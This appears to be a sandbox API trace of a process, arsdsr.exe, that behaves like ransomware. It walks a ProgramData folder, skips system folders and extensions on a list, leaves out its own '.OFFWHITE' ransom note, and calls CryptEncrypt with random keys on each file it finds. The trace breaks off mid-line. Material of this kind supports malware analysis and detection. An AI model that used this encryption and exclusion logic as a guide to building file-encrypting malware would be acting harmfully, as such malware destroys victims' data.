[0144.076] lstrcmpiW (lpString1=".ico", lpString2=".url") returned -1 [0144.076] lstrcmpiW (lpString1=".ico", lpString2=".ttf") returned -1 [0144.076] lstrcmpiW (lpString1=".ico", lpString2=".mp3") returned -1 [0144.076] lstrcmpiW (lpString1=".ico", lpString2=".pif") returned -1 [0144.077] lstrcmpiW (lpString1=".ico", lpString2=".mp4") returned -1 [0144.077] lstrcmpiW (lpString1=".ico", lpString2=".OFFWHITE") returned -1 [0144.077] lstrcmpiW (lpString1=".ico", lpString2=".msi") returned -1 [0144.077] lstrcmpiW (lpString1="folder.ico", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0144.077] GetProcessHeap () returned 0x500000 [0144.077] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e850 [0144.077] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.077] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.077] GetProcessHeap () returned 0x500000 [0144.077] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531668 [0144.077] GetProcessHeap () returned 0x500000 [0144.077] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531638 [0144.077] GetProcessHeap () returned 0x500000 [0144.077] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55d650 [0144.077] GetProcessHeap () returned 0x500000 [0144.077] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55d758 [0144.077] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.077] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.077] SystemFunction036 (in: RandomBuffer=0x531668, RandomBufferLength=0x10 | out: RandomBuffer=0x531668) returned 1 [0144.078] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.078] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.078] SystemFunction036 (in: RandomBuffer=0x531638, RandomBufferLength=0x10 | out: RandomBuffer=0x531638) returned 1 [0144.078] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.078] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.078] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55d650*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55d650*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.078] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.078] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.078] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55d758*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55d758*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.078] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.078] SetLastError (dwErrCode=0x0) [0144.078] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55d650, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.078] GetLastError () returned 0x6 [0144.078] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2db04ce, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2db04ce, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c0e93d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x72ee, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="netfol.ico", cAlternateFileName="")) returned 1 [0144.079] lstrcmpiW (lpString1="netfol.ico", lpString2=".") returned 1 [0144.079] lstrcmpiW (lpString1="netfol.ico", lpString2="..") returned 1 [0144.079] lstrcmpiW (lpString1="netfol.ico", lpString2="...") returned 1 [0144.079] lstrcmpiW (lpString1="netfol.ico", lpString2="windows") returned -1 [0144.079] lstrcmpiW (lpString1="netfol.ico", lpString2="$recycle.bin") returned 1 [0144.079] lstrcmpiW (lpString1="netfol.ico", lpString2="rsa") returned -1 [0144.079] lstrcmpiW (lpString1="netfol.ico", lpString2="ntuser.dat") returned -1 [0144.079] lstrcmpiW (lpString1="netfol.ico", lpString2="programdata") returned -1 [0144.079] lstrcmpiW (lpString1="netfol.ico", lpString2="appdata") returned 1 [0144.079] lstrcmpiW (lpString1="netfol.ico", lpString2="program files") returned -1 [0144.079] lstrcmpiW (lpString1="netfol.ico", lpString2="program files (x86)") returned -1 [0144.079] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" [0144.079] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="netfol.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" [0144.079] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.079] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.079] PathFindExtensionW (pszPath="netfol.ico") returned=".ico" [0144.079] lstrcmpiW (lpString1=".ico", lpString2=".exe") returned 1 [0144.079] lstrcmpiW (lpString1=".ico", lpString2=".log") returned -1 [0144.079] lstrcmpiW (lpString1=".ico", lpString2=".cab") returned 1 [0144.079] lstrcmpiW (lpString1=".ico", lpString2=".cmd") returned 1 [0144.079] lstrcmpiW (lpString1=".ico", lpString2=".com") returned 1 [0144.079] lstrcmpiW (lpString1=".ico", lpString2=".cpl") returned 1 [0144.079] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0144.079] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0144.079] lstrcmpiW (lpString1=".ico", lpString2=".url") returned -1 [0144.079] lstrcmpiW (lpString1=".ico", lpString2=".ttf") returned -1 [0144.080] lstrcmpiW (lpString1=".ico", lpString2=".mp3") returned -1 [0144.080] lstrcmpiW (lpString1=".ico", lpString2=".pif") returned -1 [0144.080] lstrcmpiW (lpString1=".ico", lpString2=".mp4") returned -1 [0144.080] lstrcmpiW (lpString1=".ico", lpString2=".OFFWHITE") returned -1 [0144.080] lstrcmpiW (lpString1=".ico", lpString2=".msi") returned -1 [0144.080] lstrcmpiW (lpString1="netfol.ico", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0144.080] GetProcessHeap () returned 0x500000 [0144.080] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e860 [0144.080] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.080] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.080] GetProcessHeap () returned 0x500000 [0144.080] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53ec28 [0144.080] GetProcessHeap () returned 0x500000 [0144.080] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53ec58 [0144.080] GetProcessHeap () returned 0x500000 [0144.080] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55d860 [0144.080] GetProcessHeap () returned 0x500000 [0144.080] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55d968 [0144.080] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.080] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.080] SystemFunction036 (in: RandomBuffer=0x53ec28, RandomBufferLength=0x10 | out: RandomBuffer=0x53ec28) returned 1 [0144.081] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.081] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.081] SystemFunction036 (in: RandomBuffer=0x53ec58, RandomBufferLength=0x10 | out: RandomBuffer=0x53ec58) returned 1 [0144.081] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.081] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.081] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55d860*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55d860*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.081] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.081] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.081] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55d968*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55d968*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.081] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.081] SetLastError (dwErrCode=0x0) [0144.081] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55d860, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.081] GetLastError () returned 0x6 [0144.081] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2ca5b43, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2ca5b43, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c10f535, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x14668, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="pictures.ico", cAlternateFileName="")) returned 1 [0144.082] lstrcmpiW (lpString1="pictures.ico", lpString2=".") returned 1 [0144.082] lstrcmpiW (lpString1="pictures.ico", lpString2="..") returned 1 [0144.082] lstrcmpiW (lpString1="pictures.ico", lpString2="...") returned 1 [0144.082] lstrcmpiW (lpString1="pictures.ico", lpString2="windows") returned -1 [0144.082] lstrcmpiW (lpString1="pictures.ico", lpString2="$recycle.bin") returned 1 [0144.082] lstrcmpiW (lpString1="pictures.ico", lpString2="rsa") returned -1 [0144.082] lstrcmpiW (lpString1="pictures.ico", lpString2="ntuser.dat") returned 1 [0144.082] lstrcmpiW (lpString1="pictures.ico", lpString2="programdata") returned -1 [0144.082] lstrcmpiW (lpString1="pictures.ico", lpString2="appdata") returned 1 [0144.082] lstrcmpiW (lpString1="pictures.ico", lpString2="program files") returned -1 [0144.082] lstrcmpiW (lpString1="pictures.ico", lpString2="program files (x86)") returned -1 [0144.082] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" [0144.082] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="pictures.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" [0144.082] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.082] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.082] PathFindExtensionW (pszPath="pictures.ico") returned=".ico" [0144.082] lstrcmpiW (lpString1=".ico", lpString2=".exe") returned 1 [0144.082] lstrcmpiW (lpString1=".ico", lpString2=".log") returned -1 [0144.082] lstrcmpiW (lpString1=".ico", lpString2=".cab") returned 1 [0144.082] lstrcmpiW (lpString1=".ico", lpString2=".cmd") returned 1 [0144.082] lstrcmpiW (lpString1=".ico", lpString2=".com") returned 1 [0144.082] lstrcmpiW (lpString1=".ico", lpString2=".cpl") returned 1 [0144.082] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0144.082] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0144.083] lstrcmpiW (lpString1=".ico", lpString2=".url") returned -1 [0144.083] lstrcmpiW (lpString1=".ico", lpString2=".ttf") returned -1 [0144.083] lstrcmpiW (lpString1=".ico", lpString2=".mp3") returned -1 [0144.083] lstrcmpiW (lpString1=".ico", lpString2=".pif") returned -1 [0144.083] lstrcmpiW (lpString1=".ico", lpString2=".mp4") returned -1 [0144.083] lstrcmpiW (lpString1=".ico", lpString2=".OFFWHITE") returned -1 [0144.083] lstrcmpiW (lpString1=".ico", lpString2=".msi") returned -1 [0144.083] lstrcmpiW (lpString1="pictures.ico", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.083] GetProcessHeap () returned 0x500000 [0144.083] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e870 [0144.083] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.083] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.083] GetProcessHeap () returned 0x500000 [0144.083] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53ec40 [0144.083] GetProcessHeap () returned 0x500000 [0144.083] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53ea48 [0144.083] GetProcessHeap () returned 0x500000 [0144.083] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55da70 [0144.083] GetProcessHeap () returned 0x500000 [0144.083] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55db78 [0144.083] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.083] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.084] SystemFunction036 (in: RandomBuffer=0x53ec40, RandomBufferLength=0x10 | out: RandomBuffer=0x53ec40) returned 1 [0144.084] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.084] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.084] SystemFunction036 (in: RandomBuffer=0x53ea48, RandomBufferLength=0x10 | out: RandomBuffer=0x53ea48) returned 1 [0144.084] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.084] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.084] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55da70*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55da70*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.084] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.084] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.084] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55db78*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55db78*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.084] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.085] SetLastError (dwErrCode=0x0) [0144.085] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55da70, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.085] GetLastError () returned 0x6 [0144.085] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2c59889, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2c59889, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c1cdc0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0144.085] lstrcmpiW (lpString1="resource.xml", lpString2=".") returned 1 [0144.085] lstrcmpiW (lpString1="resource.xml", lpString2="..") returned 1 [0144.085] lstrcmpiW (lpString1="resource.xml", lpString2="...") returned 1 [0144.085] lstrcmpiW (lpString1="resource.xml", lpString2="windows") returned -1 [0144.085] lstrcmpiW (lpString1="resource.xml", lpString2="$recycle.bin") returned 1 [0144.085] lstrcmpiW (lpString1="resource.xml", lpString2="rsa") returned -1 [0144.085] lstrcmpiW (lpString1="resource.xml", lpString2="ntuser.dat") returned 1 [0144.085] lstrcmpiW (lpString1="resource.xml", lpString2="programdata") returned 1 [0144.085] lstrcmpiW (lpString1="resource.xml", lpString2="appdata") returned 1 [0144.085] lstrcmpiW (lpString1="resource.xml", lpString2="program files") returned 1 [0144.085] lstrcmpiW (lpString1="resource.xml", lpString2="program files (x86)") returned 1 [0144.085] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" [0144.085] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="resource.xml" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" [0144.085] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.085] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.085] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0144.085] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0144.085] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0144.085] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0144.085] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0144.086] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0144.086] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0144.086] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0144.086] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0144.086] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0144.086] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0144.086] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0144.086] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0144.086] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0144.086] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0144.086] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0144.086] lstrcmpiW (lpString1="resource.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.086] GetProcessHeap () returned 0x500000 [0144.086] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e880 [0144.086] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.088] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.088] GetProcessHeap () returned 0x500000 [0144.089] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53ea60 [0144.089] GetProcessHeap () returned 0x500000 [0144.089] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53ea78 [0144.089] GetProcessHeap () returned 0x500000 [0144.089] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55dc80 [0144.089] GetProcessHeap () returned 0x500000 [0144.089] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55dd88 [0144.089] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.089] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.089] SystemFunction036 (in: RandomBuffer=0x53ea60, RandomBufferLength=0x10 | out: RandomBuffer=0x53ea60) returned 1 [0144.089] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.089] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.089] SystemFunction036 (in: RandomBuffer=0x53ea78, RandomBufferLength=0x10 | out: RandomBuffer=0x53ea78) returned 1 [0144.089] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.089] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.089] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55dc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55dc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.089] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.089] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.090] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55dd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55dd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.090] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.090] SetLastError (dwErrCode=0x0) [0144.090] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55dc80, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.090] GetLastError () returned 0x6 [0144.090] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2cf1dfd, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2cf1dfd, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c1f3d69, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xcaa9, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="ringtones.ico", cAlternateFileName="")) returned 1 [0144.090] lstrcmpiW (lpString1="ringtones.ico", lpString2=".") returned 1 [0144.090] lstrcmpiW (lpString1="ringtones.ico", lpString2="..") returned 1 [0144.090] lstrcmpiW (lpString1="ringtones.ico", lpString2="...") returned 1 [0144.090] lstrcmpiW (lpString1="ringtones.ico", lpString2="windows") returned -1 [0144.090] lstrcmpiW (lpString1="ringtones.ico", lpString2="$recycle.bin") returned 1 [0144.090] lstrcmpiW (lpString1="ringtones.ico", lpString2="rsa") returned -1 [0144.090] lstrcmpiW (lpString1="ringtones.ico", lpString2="ntuser.dat") returned 1 [0144.090] lstrcmpiW (lpString1="ringtones.ico", lpString2="programdata") returned 1 [0144.090] lstrcmpiW (lpString1="ringtones.ico", lpString2="appdata") returned 1 [0144.090] lstrcmpiW (lpString1="ringtones.ico", lpString2="program files") returned 1 [0144.090] lstrcmpiW (lpString1="ringtones.ico", lpString2="program files (x86)") returned 1 [0144.090] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" [0144.090] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="ringtones.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" [0144.091] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.091] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.091] PathFindExtensionW (pszPath="ringtones.ico") returned=".ico" [0144.091] lstrcmpiW (lpString1=".ico", lpString2=".exe") returned 1 [0144.091] lstrcmpiW (lpString1=".ico", lpString2=".log") returned -1 [0144.091] lstrcmpiW (lpString1=".ico", lpString2=".cab") returned 1 [0144.091] lstrcmpiW (lpString1=".ico", 